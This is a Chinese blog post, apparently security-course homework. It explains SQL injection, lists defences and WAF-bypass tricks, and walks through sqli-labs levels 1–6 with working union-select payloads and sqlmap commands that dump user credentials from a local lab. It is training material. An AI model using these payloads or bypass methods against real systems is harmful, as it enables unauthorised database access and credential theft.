第五次作业—8.30—G_c

最新推荐文章于 2024-09-09 17:43:45 发布
最新推荐文章于 2024-09-09 17:43:45 发布
阅读量574 收藏 8
点赞数 22
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63091342/article/details/141791368
版权

1.总结SQL注入原理、SQL注入常用函数及含义,SQL注入防御手段,SQL注入常用绕过waf的方法

SQL注入原理:

SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。

SQL注入常用函数及含义:

version()                 # 查看数据库版本
database()                # 查看当前数据库名
user()                    # 查看当前数据库用户
system_user()             # 查看系统用户名
group_concat()            # 把数据库中的某列数据或某几列数据合并为一个字符串
@@datadir                 # 查看数据库路径
@@version_compile_os      # 查看操作系统
concat()                        #连接多个字符串

information_schema     #系统数据库,包含所以数据库信息

SQL注入防御手段:

1. 使用参数化查询
2. 输入验证和过滤
3. 使用存储过程
4. 最小权限原则
5. 使用ORM框架
6. 使用准备语句
7. 使用安全的数据库连接
8. 避免动态拼接SQL语句
9. 使用防火墙和入侵检测系统
10. 定期更新和维护数据库软件

SQL注入常用绕过waf的方法:

  • 绕过空格(常用:注释符/**/,%20)--注意:%27为’#为%23
  • 括号绕过空格(理解原理+合理利用:注意%28、%29表示())
  • 引号绕过(引号内字母 转 十六进制):
  • 逗号绕过(使用from或者offset(偏移量)或者jion或者like或者limit)
  • 比较符号(<、>)绕过WAF过滤(sqlmap盲注经常使用<、>,使用between的脚本):
  • or and xor not绕过:
  • 绕过注释符号(#,--(后面跟一个空格))过滤:
  • “ = ”符号 绕过(like 、rlike 、regexp 或者 < 或者 >)
  • 绕过union,select,where:
  • 通用绕过(编码):
  • 等价函数绕过:
  • 宽字节注入:
  • HTTP参污染:
  • 更改前台提交方式:
  • 垃圾参数:
  • 组合绕过、分块传输、协议未覆盖、FUZZ大法、反序列化(有空处理)
     


2.sqli-labs通关前5关,并写出解题步骤,必须手工过关,禁止使用sqlmap

level1

1.让输入ID,尝试输入?id=1'--+判断为字符型注入

2.联合查询,看看有多少列?id=1' order by 3 --+

order by 4 报错,说明只有三列

3.查看数据库版本?id=-1'union select 1,database(),version()--+

显示当前在security数据库,版本是5.7.26;mysql5以上存在内置库information_schema

4.使用?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+查看表名

5.在users表中查找 ?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

6.查找username,id,password;?id=-1'union select 1,2,group_concat(username,"-",id,"-",password) from users --+

level2

1.同理,先试试注入类型?id=1'

属于字符型

2.流程和第一关相同,直接上结果:?id=-1 union select 1,2,group_concat(username,"-",id,"-",password) from users --+

level3

1.老规矩直接上?id=1'发现还是字符型,但是加了个括号,所以后面注入时要闭合括号

2.流程也差不多直接上结果:?id=-1') union select 1,2,group_concat(username,"-",id,"-",password) from users --+

level4

1.老规矩直接上?id=1'

2.再试试?id=1"

发现属于双引号字符型,且带括号

3.过程差不多,只是语句稍加修改:?id=-1") union select 1,2,group_concat(username,"-",id,"-",password) from users --+

level5

1.单引号双引号都可以,也没有括号,网上看看大家的做法,发现好!麻!烦!,于是直接sqlmap启动!!

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-5?id=1' --dbs 

2.盲猜数据库是security,查看下users的字段

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-5?id=1' -D 'security' -T 'users' --columns

3.查数据

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-5?id=1' -D 'security' -T 'users' --dump


3.总结SQLi的手工注入的步骤

  1. 判断有无注入点
  2. 猜解列名数量
  3. 通过报错方式判断回显点
  4. 利用union select进行信息收集
  5. 获取数据库结构信息
  6. 提取敏感数据


4.使用sqlmap通过或验证第六关

1.查找数据库

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-6?id=1' --dbs 

2.查找数据库的表

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-5?id=1' -D 'security' -tables  

3.查寻字段

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-6?id=1' -D 'security' -T 'users' --columns

4.dump

sqlmap -u 'http://192.168.92.1/sqli-labs-master/sqli-labs-master/Less-6?id=1' -D 'security' -T 'users' --dump

夏 木.
关注
  • 22
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据库理论作业 第八章 29 33
Ding 的博客
11-03 6456
数据库理论作业 第八章 8.29 考虑如下关系模式r(A,B,C,D,E,F)上的函数依赖集F: A->BCD BC->DE B->D D->A a.计算B+ 最初result=B; 由于B->D,故result=B∪D=BD; 由于D->A,故result=BD∪A=ABD; 由于A->BCD,故result=ABD∪BCD...
多年收集的一些稀有软件3
weixin_33739541的博客
10-06 8281
QQ:365543212 Digital Canal Multiple Load Footing v4.5 1CD(定义出梯形的、带状的或矩形的脚柱的多种负重) Digital Canal Quick Wall v5.7 1CD(保留墙设计软件,同时拥有卓越的精确性) Digital Canal Spread Footing v2.3 1CD(圆柱体设计软件,可以同时处理10个圆柱体还可以...
c语言第十章函数课后作业,2012年计算机等级二级C语言章节习题及答案(7)
weixin_28761343的博客
05-16 1866
第8章函数一、选择题(在下列各题的A)、B)、C)、D)四个选项中,只有一个选项是正确的,请将正确选项填涂在答题卡相应位置上。)8.1若已定义的函数有返回值,则以下关于该函数调用的叙述中错误的是A)函数调用可以作为独立的语句存在B)函数调用可以作为一个函数的实参C)函数调用可以出现在表达式中D)函数调用可以作为一个函数的形参考生答案:正确答案:D8.2在调用函数时,如果实参是简单的变量,...
8.30 vim编辑器 文件查找 文件系统 作业(练习)
weixin_33862993的博客
09-08 187
Vim编辑器: 全屏幕的编辑器:VIM vi: visual interface sed:行编辑器 vi, vi iMproved vim: 模式化: 编辑模式:命令模式 输入模式: 末行模式: 编辑模式 --> 输入模式: i: insert, a:append, o:new line, I: 行首 A:行尾 O:上方新建行 输入...
《CS224n斯坦福课程》-----第一部分的大作业
赵小越的博客
12-13 1218
         看到简化版的题目,我觉得我就像一个脑残,根本看不懂,只有看到原题目,我才知道要做啥。我现在把原题目贴出来,然后一一的解答。         题目意思: (a) 证明softmax函数的一个性质,在输入中存在偏移,但softmax的值是不随着偏移而改变。在实践中,我们认为这个偏移值一般是输入中的最大值。 (b) 给出输入矩阵,N行D列,然后计算每行的softmax函数值,最...
第1周作业
pipixxia的博客
07-02 76
1)如何通过一个简短的关键字 【man -k man -k process 】,例如process 获取相关的命令。答:man -k man -k process :man -k 命令用于在 Linux 系统上搜索与关键字相关的手册页(man pages)。此命令中,使用了两次 -k 参数,然后跟着两个关键字:man 和 process。man -k 和 man -k process 是相同的命令,只是后者具体指定了要搜索的关键字为 “process”。
进程,系统性能和计划任务
weixin_43332972的博客
10-02 1969
进程命令,计划任务
2018 AI产业界大盘点
喜欢打酱油的老鸟
12-26 6975
2018 AI产业界大盘点     大事件盘点   “ 1.24——Facebook人工智能部门负责人Yann LeCun宣布卸任 Facebook人工智能研究部门(FAIR)的负责人Yann LeCun宣布卸任,之后将担任Facebook首席人工智能科学家,保留对FAIR的研究方向的控制。同时,原工作将由新任负责人Jérôme Pesenti 接替,Facebook应用机器学习小组...
MySql查询之单表查询 --附练习素材
UNIQUE_XIAOXI的博客
11-15 3321
目标: 熟练掌握SQL查询 DML : insert update delete//插入:insert insert into table_name(col1, col2,...) values(val1, val2, ...); insert into table_name(col1, col2,...) values(val1, val2, ...), (val1, val2, ...)
LINUX指令:查日志,查性能
时间墨客
02-04 492
查日志,查性能常用shell指令
多年收集的一些稀有软件4
热门推荐
weixin_33728708的博客
10-06 2万+
QQ:365543212  Geovariances产品: Geovariances Isatis 2013 1CD(地质统计学软件) Geovariances.Isatis.2016.Win64 1CD Geovariances Minestis 2016 v2.0.0Win64 1CD   软脑公司产品: 3D-Sigma for WinALL-ISO 1CD(岩土体三维应力分...
oracle AWR 报告 中文版
常语的专栏
12-06 6370
DB名称 DB标识 例 实例数 启动时间 发布 RAC MYPL 569030708 mypl 1 03日-12月13 20:12 11.2.0.1.0 NO 主机名称 平台 处理器 核心 套接字 内存(GB) Orale在
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8454
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
零信任安全:重新思考数字世界的访问
网络研究观
09-09 625
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
网站安全需求分析与安全保护工程
最新发布
weixin_49171105的博客
09-09 356
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1404
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 399
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 801
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
cron 每天8.30到10.30 每小时执行一次
06-09
您可以使用以下 cron 表达式来实现每天 8:30 到 10:30 每小时执行一次的功能: ``` 30 8-10/1 * * * command ``` 这个表达式的意思是:在每天的第 30 分钟,如果小时在 8 到 10 之间,每小时执行一次指定的命令。您可以将 "command" 替换为您需要执行的实际命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值